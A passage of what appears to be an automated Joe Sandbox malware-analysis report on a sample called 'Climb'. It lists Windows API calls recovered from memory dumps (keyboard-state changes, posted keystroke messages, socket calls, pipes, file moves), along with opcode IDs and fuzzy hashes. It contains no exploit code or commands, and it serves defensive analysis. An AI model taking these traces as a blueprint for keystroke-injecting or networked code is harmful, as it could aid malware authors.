                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 0011B9C4
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0011B9E7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                          • Opcode ID: 8259e24e9754054368c32fb7b2593cb06da51a5b2109b6690ca8e88babeafc74
                                                                                                                                                                          • Instruction ID: ce81d6ffacd49245fc84dbe0585f0764f9bc3a081bf7b045db4dc89e7510bd79
                                                                                                                                                                          • Opcode Fuzzy Hash: 8259e24e9754054368c32fb7b2593cb06da51a5b2109b6690ca8e88babeafc74
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51D3A050C7D93EFB3A42388C95BFA7EA95F06708F0884A9E1D5468D2C3E8ADC5D750
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetParent.USER32(00000000), ref: 0011B6E0
                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0011B6F5
                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0011B756
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0011B782
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0011B79F
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0011B7DE
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0011B7FF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                          • Opcode ID: 2e519ef3a008dc7378e031ac764efd15e6b61368989381367a4c1e9b8f58002d
                                                                                                                                                                          • Instruction ID: e0609b871edb064ec59660817449f185cd6a9c3b0c08d72650f5138f361e74e5
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e519ef3a008dc7378e031ac764efd15e6b61368989381367a4c1e9b8f58002d
                                                                                                                                                                          • Instruction Fuzzy Hash: 0851C0A090C7D53EFB3A83248C95BFABEA95B46704F0884A9E1D94A8D2D394ECD4D750
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,000E5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 000E57E3
                                                                                                                                                                          • __fassign.LIBCMT ref: 000E585E
                                                                                                                                                                          • __fassign.LIBCMT ref: 000E5879
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 000E589F
                                                                                                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,000E5F16,00000000,?,?,?,?,?,?,?,?,?,000E5F16,?), ref: 000E58BE
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,000E5F16,00000000,?,?,?,?,?,?,?,?,?,000E5F16,?), ref: 000E58F7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                          • Opcode ID: 1ea91d00cd86a46f078752957ee45cd1096c9160b7e45cd5d6de7d3ba2d8c022
                                                                                                                                                                          • Instruction ID: eb4bb06425943b07696f64e7f248d082864ce626f3ca5f4f7cf7727b6dbc4c2c
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ea91d00cd86a46f078752957ee45cd1096c9160b7e45cd5d6de7d3ba2d8c022
                                                                                                                                                                          • Instruction Fuzzy Hash: D251C171A00689EFCB10CFA9DC85AEEBBF8EF09311F14451AE955F7292D7309A41CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 000D30BB
                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 000D30C3
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 000D3151
                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 000D317C
                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 000D31D1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                          • Opcode ID: b51aa02361e2dd528e534edabbc40fff9a1deeced889d01a16b16b241459516b
                                                                                                                                                                          • Instruction ID: 76027259f9604e36cc2ef22ad1f81d8acfb8e95340f27d3397fca2dcdc17f29b
                                                                                                                                                                          • Opcode Fuzzy Hash: b51aa02361e2dd528e534edabbc40fff9a1deeced889d01a16b16b241459516b
                                                                                                                                                                          • Instruction Fuzzy Hash: 3D41B638E00309ABCF10DF68C895AEEBBF5AF45314F148156E8156B392D771DB45CBA2
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00133AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00133AD7
                                                                                                                                                                            • Part of subcall function 00133AAB: _wcslen.LIBCMT ref: 00133AF8
                                                                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00131B6F
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00131B7E
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00131C26
                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 00131C56
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2675159561-0
                                                                                                                                                                          • Opcode ID: 4688b8c601d734327249c0a561c9aef04bdab8290e4f1a3c138cb06532c1fb5e
                                                                                                                                                                          • Instruction ID: d73c47080440d9fc9f45af17f93fa19209b47c88f475408a484f67109e1bb9d7
                                                                                                                                                                          • Opcode Fuzzy Hash: 4688b8c601d734327249c0a561c9aef04bdab8290e4f1a3c138cb06532c1fb5e
                                                                                                                                                                          • Instruction Fuzzy Hash: B541E635600114AFDB109F24D885BF9BBE9EF45364F148069FC19AB292DB74ED81CBE1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0011E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0011D7CD,?), ref: 0011E714
                                                                                                                                                                            • Part of subcall function 0011E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0011D7CD,?), ref: 0011E72D
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0011D7F0
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0011D82A
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0011D8B0
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0011D8C6
                                                                                                                                                                          • SHFileOperationW.SHELL32(?), ref: 0011D90C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                          • API String ID: 3164238972-1173974218
                                                                                                                                                                          • Opcode ID: 56781a7477aceecbee4c66edbe0b32b36de1cf02e591dab40ce8c3643d940a4a
                                                                                                                                                                          • Instruction ID: 4838b9924fd334896313d291c34dae994514c7e66a580a2803e7214bc60b93a1
                                                                                                                                                                          • Opcode Fuzzy Hash: 56781a7477aceecbee4c66edbe0b32b36de1cf02e591dab40ce8c3643d940a4a
                                                                                                                                                                          • Instruction Fuzzy Hash: 454160719452189FDF16EBA4E981ADE73F8AF19340F4004FAE509EB142EB34A7C8CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001438B8
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 001438EB
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00143920
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00143952
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0014397C
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0014398D
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001439A7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2178440468-0
                                                                                                                                                                          • Opcode ID: d089884e9c6f921ff61e9def20e4d826ad7c65c40a984fe1c97021cd93e4346c
                                                                                                                                                                          • Instruction ID: 3a5feb187349234ca6b0509e940270f7e2c7d4ed25b0fdf36d97875f80d255f0
                                                                                                                                                                          • Opcode Fuzzy Hash: d089884e9c6f921ff61e9def20e4d826ad7c65c40a984fe1c97021cd93e4346c
                                                                                                                                                                          • Instruction Fuzzy Hash: 44313934704255AFDB21CF48EC95F6437E1FB8A718F151164F5208B6B1CBB1AE85DB01
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001180D0
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001180F6
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 001180F9
                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00118117
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00118120
                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00118145
                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00118153
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                          • Opcode ID: 53d9a1e3a2c4877c3b6787eba7825f45c78e419b14882e854d74bd1a83451e6b
                                                                                                                                                                          • Instruction ID: 0e4c82ef99b91038d27c6daa70a26723a58cdd2a0972446953c558942d4413ba
                                                                                                                                                                          • Opcode Fuzzy Hash: 53d9a1e3a2c4877c3b6787eba7825f45c78e419b14882e854d74bd1a83451e6b
                                                                                                                                                                          • Instruction Fuzzy Hash: F4218376600219BFDF14DFA8DC84DFA73ACEB0A360B048525F905DB2A0DB74DC868B60
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001181A9
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001181CF
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 001181D2
                                                                                                                                                                          • SysAllocString.OLEAUT32 ref: 001181F3
                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 001181FC
                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00118216
                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00118224
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                          • Opcode ID: c93de3a6304fb173b8056b62bdfe935af50e9a9994b907313d2931516fc1e515
                                                                                                                                                                          • Instruction ID: 70452320d45cb8b1339f7a759c982e1b12d58d76059d9c367bf6754a96aa0282
                                                                                                                                                                          • Opcode Fuzzy Hash: c93de3a6304fb173b8056b62bdfe935af50e9a9994b907313d2931516fc1e515
                                                                                                                                                                          • Instruction Fuzzy Hash: 34216076600214BF9F159BA8EC89DAA77ECEB0A360704C125F905CB2A1DB74EC81CB64
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00120E99
                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00120ED5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                          • String ID: nul
                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                          • Opcode ID: af581ddd434b312ffcf7d58afa532924356f1d178f4ff21f4e99816487487535
                                                                                                                                                                          • Instruction ID: 9392942ef8192580fc48ffd3f06fe80d4a684476572446dd35d48b7675ea8d66
                                                                                                                                                                          • Opcode Fuzzy Hash: af581ddd434b312ffcf7d58afa532924356f1d178f4ff21f4e99816487487535
                                                                                                                                                                          • Instruction Fuzzy Hash: DE218074540319ABDF318F24ED04A9A77A8FF59720F214B19FDA5D72E1D77098A0CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00120F6D
                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00120FA8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                          • String ID: nul
                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                          • Opcode ID: 9b00c0f323bee4d755d9ae983617dc172c102c163bdbde66d5986ec5d029f16d
                                                                                                                                                                          • Instruction ID: a540ca5063a6b10b8b3e104fbf428722aae81175bbbc2c86a62be25d366fdfc6
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b00c0f323bee4d755d9ae983617dc172c102c163bdbde66d5986ec5d029f16d
                                                                                                                                                                          • Instruction Fuzzy Hash: 8521A775640365EBDB309F68AC04A9977E8BF69720F200B19F8A1D32E1D77099A0DB54
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000B78B1
                                                                                                                                                                            • Part of subcall function 000B7873: GetStockObject.GDI32(00000011), ref: 000B78C5
                                                                                                                                                                            • Part of subcall function 000B7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B78CF
                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00144BB0
                                                                                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00144BBD
                                                                                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00144BC8
                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00144BD7
                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00144BE3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                                                                          • Opcode ID: b5b8d6038d1d4d4da134cff31a5473f33da1f9ec311fa7300f4abf7dfff261a9
                                                                                                                                                                          • Instruction ID: e5468dab0b2ad0392bbf0c1bb37b4ee9c9d07dd48ac0470ca1b04113844e980a
                                                                                                                                                                          • Opcode Fuzzy Hash: b5b8d6038d1d4d4da134cff31a5473f33da1f9ec311fa7300f4abf7dfff261a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A1193B1150219BEEF118E64CC85EEB7FADEF08758F014110B608A2060CB72DC619BA4
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000EDB23: _free.LIBCMT ref: 000EDB4C
                                                                                                                                                                          • _free.LIBCMT ref: 000EDBAD
                                                                                                                                                                            • Part of subcall function 000E2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4), ref: 000E2D4E
                                                                                                                                                                            • Part of subcall function 000E2D38: GetLastError.KERNEL32(00181DC4,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4,00181DC4), ref: 000E2D60
                                                                                                                                                                          • _free.LIBCMT ref: 000EDBB8
                                                                                                                                                                          • _free.LIBCMT ref: 000EDBC3
                                                                                                                                                                          • _free.LIBCMT ref: 000EDC17
                                                                                                                                                                          • _free.LIBCMT ref: 000EDC22
                                                                                                                                                                          • _free.LIBCMT ref: 000EDC2D
                                                                                                                                                                          • _free.LIBCMT ref: 000EDC38
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                          • Instruction ID: d539bbd02b5761f7dc3e775732939bae3dd9122e034ce6429b0664a42b0ab11c
                                                                                                                                                                          • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                          • Instruction Fuzzy Hash: 96110A72545B88EED620FBB2CC07FCB77DCAF14700F414C1AB299BA263EB65B5148651
                                                                                                                                                                          APIs
